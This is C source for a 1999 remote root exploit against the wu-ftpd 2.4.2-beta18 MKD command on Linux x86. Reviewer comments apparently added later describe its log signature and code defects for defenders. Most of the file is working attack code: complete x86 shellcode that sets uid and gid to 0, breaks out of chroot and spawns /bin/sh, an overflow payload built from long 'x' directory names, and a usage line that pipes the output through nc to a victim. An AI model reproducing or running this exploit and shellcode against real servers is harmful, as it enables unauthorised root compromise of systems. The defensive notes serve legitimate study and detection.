/*
 * wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 )
 * by joey__ <youcan_reachmeat_private> of rhino9 <http://www.rhino9.com> - 2/20/99
 *
 * big thx horizon, duke, nimrood and icee
 * sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha
 *
 * USAGE:
 * ( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport>
 */

/*
 * Review notes (defender's reading of this file):
 *  - The program does no networking itself: main() writes an FTP command
 *    script ("user", "pass", "cwd", "mkd" lines) to stdout.  The distinctive
 *    part of that script is four cwd/mkd pairs whose path components are
 *    170-250 byte runs of 'x', followed by a final mkd whose argument is
 *    x86_shellcode0, 32 re-encoded bytes of x86_shellcode1, and a 4-byte
 *    address.  MKD/CWD arguments of that length and shape in FTP server
 *    logs are the observable artefact for log review or an IDS rule.
 *  - atoi() and strlen() are called without <stdlib.h>/<string.h>; this
 *    relies on pre-C99 implicit function declarations.  main() has no
 *    return type (implicit int) and no return statement.
 *  - vardir is char[300].  main() writes vardir[varlen] and
 *    vardir[varlen+4] with varlen derived from argv[4] and argv[1] without
 *    a bounds check, so the tool itself can write outside vardir (see the
 *    per-line notes in main()).
 */

#include <stdio.h>

/*
 * Stage-0 payload.  Declared [156] and the initializer is exactly 156
 * bytes, so there is no terminating NUL: sizeof ( x86_shellcode0 ) == 156
 * is the copy length used in main(), and the array must not be handed to
 * any str* function.  The trailing "var0"/"cmd0"/"cmd1" bytes are the
 * scratch area the code addresses relative to esi (per-instruction
 * comments are the original author's).
 */
char x86_shellcode0[156] =
    "\x83\xec\x04" /* sub esp,4 */
    /* esi -> local variables and data */
    "\x5e" /* pop esi */
    "\x83\xc6\x70" /* add esi,0x70 */
    "\x83\xc6\x20" /* add esi,0x20 */
    "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
    /* decode the strings */
    "\x31\xc9" /* xor ecx, ecx */
    "\xb1\x30" /* mov cl,0x30 */
    "\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */
    "\x43" /* inc ebx */
    "\x49" /* dec ecx */
    "\x75\xf9" /* jnz short decode_next_byte */
    "\x31\xc0" /* xor eax,eax */
    /* setuid ( 0 ) */
    "\x89\xc3" /* mov ebx,eax */
    "\xb0\x17" /* mov al,0x17 */
    "\xcd\x80" /* int 0x80 */
    "\x31\xc0" /* xor eax,eax */
    /* setgid ( 0 ) */
    "\x89\xc3" /* mov ebx,eax */
    "\xb0\x2e" /* mov al,0x2e */
    "\xcd\x80" /* int 0x80 */
    /*
     * To break chroot we have to...
     *   fd = open ( ".", O_RDONLY );
     *   mkdir ( "hax0r", 0666 );
     *   chroot ( "hax0r" );
     *   fchdir ( fd );
     *   for ( i = 0; i < 254; i++ ) chdir ( ".." );
     *   chroot ( "." );
     */
    "\x31\xc0" /* xor eax,eax */
    /* var0 = open ( ".", O_RDONLY ) */
    "\x31\xc9" /* xor ecx,ecx */
    "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
    "\xb0\x05" /* mov al,0x05 */
    "\xcd\x80" /* int 0x80 */
    "\x89\x06" /* mov [esi],eax */
    "\x31\xc0" /* xor eax,eax */
    /* mkdir ( "hax0r", 0666 ) */
    "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
    "\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */
    "\xb0\x27" /* mov al,0x27 */
    "\xcd\x80" /* int 0x80 */
    "\x31\xc0" /* xor eax,eax */
    /* chroot ( "hax0r" ) */
    "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
    "\xb0\x3d" /* mov al,0x3d */
    "\xcd\x80" /* int 0x80 */
    "\x31\xc0" /* xor eax,eax */
    /* fchdir ( fd ) */
    "\x8b\x1e" /* mov ebx,[esi] */
    "\xb0\x85" /* mov al,0x85 */
    "\xcd\x80" /* int 0x80 */
    "\x31\xc9" /* xor ecx, ecx */
    /* for ( i = 0; i < 254; i++ ) { */
    "\xb1\xfe" /* mov cl,0xfe */
    "\x31\xc0" /* xor eax,eax */
    /* chdir ( ".." ) */
    "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
    "\xb0\x0c" /* mov al,0x0c */
    "\xcd\x80" /* int 0x80 */
    "\x49" /* dec ecx */
    /* } */
    "\x75\xf4" /* jnz short goto_parent_dir */
    "\x31\xc0" /* xor eax,eax */
    /* chroot ( "." ) */
    "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
    "\xb0\x3d" /* mov al,0x3d */
    "\xcd\x80" /* int 0x80 */
    "\x31\xc0" /* xor eax,eax */
    /* execve ( "/bin/sh", "xxxxx", NULL ) */
    "\x8d\x5e\x17" /* lea ebx,[esi+0x17] */
    "\x8d\x4e\x04" /* lea ecx,[esi+0x04] */
    "\x8d\x56\x08" /* lea edx,[esi+0x08] */
    "\x89\x19" /* mov [ecx],ebx */
    "\x89\x02" /* mov [edx],eax */
    "\xb0\x0b" /* mov al, 0x0b */
    "\xcd\x80" /* int 0x80 */
    "\x31\xdb" /* xor ebx,ebx */
    /* exit ( 0 ) */
    "\x89\xd8" /* mov eax,ebx */
    "\x40" /* inc eax */
    "\xcd\x80" /* int 0x80 */
    "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90"
    "var0" /* local variable integer */
    "cmd0" /* char *cmd[2] */
    "cmd1";

/*
 * Stage-1 data: the "..", ".", "hax0r" and "/bin/sh" strings the syscalls
 * above reference through esi, plus the 4-byte value 0x1b6 (== 0666, the
 * mkdir mode).  Only the first 32 bytes are used by main(), each with
 * 0x32 added so the NUL separators do not end the transmitted string; the
 * decode loop at the top of x86_shellcode0 subtracts 0x32 again.  The
 * array is declared far larger (1024) than the data it holds.
 */
char x86_shellcode1[1024] =
    ".." "\x00"
    "." "\x00"
    "hax0r" "\x00"
    "/bin/sh" "\x00"
    "\xb6\x01\x00\x00";

/* Scratch buffer for each path component emitted by main(). */
char vardir[300];
/* Length of the component currently being built in vardir. */
int varlen;

/*
 * Writes the FTP command script to stdout.  argv[1] is the initial
 * directory, argv[2]/argv[3] the credentials, argv[4]/argv[5] the buffer
 * offset and address (see USAGE above); defaults are used when absent.
 * NOTE(review): no return type (implicit int) and no return statement.
 */
main ( int argc, char **argv )
{
    char *username, *password, *initialdir;
    int bufoffset, codeaddr, i, j, *pcodeaddr;

    if ( argc > 1 ) initialdir = argv[1];
    else initialdir = "/incoming";

    if ( argc > 3 ) { username = argv[2]; password = argv[3]; }
    else { username = "anonymous"; password = "poonat_private"; }

    /* NOTE(review): atoi() reports no conversion errors; the values are used unchecked below. */
    if ( argc > 5 ) { bufoffset = atoi ( argv[4] ); codeaddr = atoi ( argv[5] ); }
    else { bufoffset = 195; codeaddr = 0x0805ac81; }

    printf ( "user %s\n", username );
    printf ( "pass %s\n", password );
    printf ( "cwd %s\n", initialdir );

    /* NOTE(review): size_t minus int narrowed to int; a negative result (initialdir longer
     * than bufoffset) or one >= sizeof vardir is not rejected before the writes below. */
    varlen = bufoffset - strlen ( initialdir );
    for ( i = 0; i < varlen; i++ ) vardir[i] = 'x';
    vardir[varlen] = 0;
    printf ( "mkd %s\n", vardir );
    printf ( "cwd %s\n", vardir );

    /* Three more fixed-length filler components (210, 210, 170 bytes of 'x'). */
    varlen = 210;
    for ( i = 0; i < varlen; i++ ) vardir[i] = 'x';
    vardir[varlen] = 0;
    printf ( "mkd %s\n", vardir );
    printf ( "cwd %s\n", vardir );

    varlen = 210;
    for ( i = 0; i < varlen; i++ ) vardir[i] = 'x';
    vardir[varlen] = 0;
    printf ( "mkd %s\n", vardir );
    printf ( "cwd %s\n", vardir );

    varlen = 170;
    for ( i = 0; i < varlen; i++ ) vardir[i] = 'x';
    vardir[varlen] = 0;
    printf ( "mkd %s\n", vardir );
    printf ( "cwd %s\n", vardir );

    /* Final component: 250 bytes of 'x', overwritten at [0,156) with x86_shellcode0
     * and at [156,188) with the re-encoded x86_shellcode1 bytes, then codeaddr at
     * [250,254) and a NUL at [254]. */
    varlen = 250;
    for ( i = 0; i < varlen; i++ ) vardir[i] = 'x';
    for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ ) vardir[i] = x86_shellcode0[i];
    j = 0;
    for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ ) {
        vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 );
    }
    /* NOTE(review): int store through a char[] at a possibly unaligned index;
     * memcpy would be the portable form. */
    pcodeaddr = ( int * ) &( vardir[varlen] );
    *pcodeaddr = codeaddr;
    vardir[varlen+4] = 0;
    printf ( "mkd %s\n", vardir );
}